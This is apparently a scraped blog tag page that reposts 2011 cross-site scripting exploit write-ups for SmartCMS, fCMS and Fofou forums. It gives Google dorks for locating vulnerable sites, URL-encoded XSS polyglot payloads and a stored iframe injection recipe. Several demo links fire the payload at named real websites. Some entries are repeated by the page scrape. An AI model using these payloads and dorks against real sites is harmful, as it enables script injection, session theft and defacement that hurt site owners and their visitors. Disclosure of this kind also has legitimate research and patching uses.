# Exploit Title: SmartCMS Cross Site Scripting
# Google Dorks: intext:"powered by SmartCMS"
# Date: 25.08.2011
# Author: Sony
# Software Link: http://www.smartwebsites.com.cy/
# Version: all version
# POC: http://st2tea.blogspot.com/2011/08/smartcms-cross-site-scripting.html
..................................................................
XSS in the Login Page.
http://server/userauthentication.php?action=login&lang=en&pageid=[XSS]
Our code:
http://codepad.org/mMQfVBcw
Demo:
1.
http://www.aigaia.com.cy/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
2.
http://www.apollofundcyprus.com/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
3.
http://www.charilaoulab.com/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Se afișează postările cu eticheta xss. Afișați toate postările
Se afișează postările cu eticheta xss. Afișați toate postările
joi, 25 august 2011
miercuri, 24 august 2011
fCMS Cross Site Scripting [elektronische Grußkarte]
# Exploit Title: fCMS Cross Site Scripting
# Google Dorks: "inurl:/_/ecards.html?_","inurl:_/ecards.html?PUC=","inurl:_/ecards.html?_PICKID="
# Date: 24.08.2011
# Author: Sony
# Software Link: http://www.fidion.de/
# Version: all version
# Proof of concept: http://st2tea.blogspot.com/2011/08/fcms-cross-site-scripting.html
..................................................................
Elektronische Grußkarte
Method Post:
http://www.fidion.de/_/ecards.html?_FRAME=33&_PICKID=
Put our code in the Pickup-Code and press button Pickup
POST /_/ecards.html?_FRAME=33&_PICKID= PUC=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
Our code:
http://codepad.org/mMQfVBcw
pics:
# Google Dorks: "inurl:/_/ecards.html?_","inurl:_/ecards.html?PUC=","inurl:_/ecards.html?_PICKID="
# Date: 24.08.2011
# Author: Sony
# Software Link: http://www.fidion.de/
# Version: all version
# Proof of concept: http://st2tea.blogspot.com/2011/08/fcms-cross-site-scripting.html
..................................................................
Elektronische Grußkarte
Method Post:
http://www.fidion.de/_/ecards.html?_FRAME=33&_PICKID=
Put our code in the Pickup-Code and press button Pickup
POST /_/ecards.html?_FRAME=33&_PICKID= PUC=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
Our code:
http://codepad.org/mMQfVBcw
pics:
Etichete:
Cross Site Scripting,
fCMS,
fidion.de,
xss
luni, 15 august 2011
Permanent XSS and Html Code Injection in the Fofou Forums
# Exploit Title: Permanent XSS and Html Code Injection in the Fofou Forums
# Google Dork: "intext:Powered by fofou"
# Date: 15/08/2011
# Author: Sony
# Software Link: http://blog.kowalczyk.info/software/fofou/index.html
# Version: all
How to use exploit:
1 : Open New Topic
2: Put in the all field the XSS Code < iframe src="http://xssed.com" >
3: And press button OK
pics:
# Google Dork: "intext:Powered by fofou"
# Date: 15/08/2011
# Author: Sony
# Software Link: http://blog.kowalczyk.info/software/fofou/index.html
# Version: all
How to use exploit:
1 : Open New Topic
2: Put in the all field the XSS Code < iframe src="http://xssed.com" >
3: And press button OK
pics:

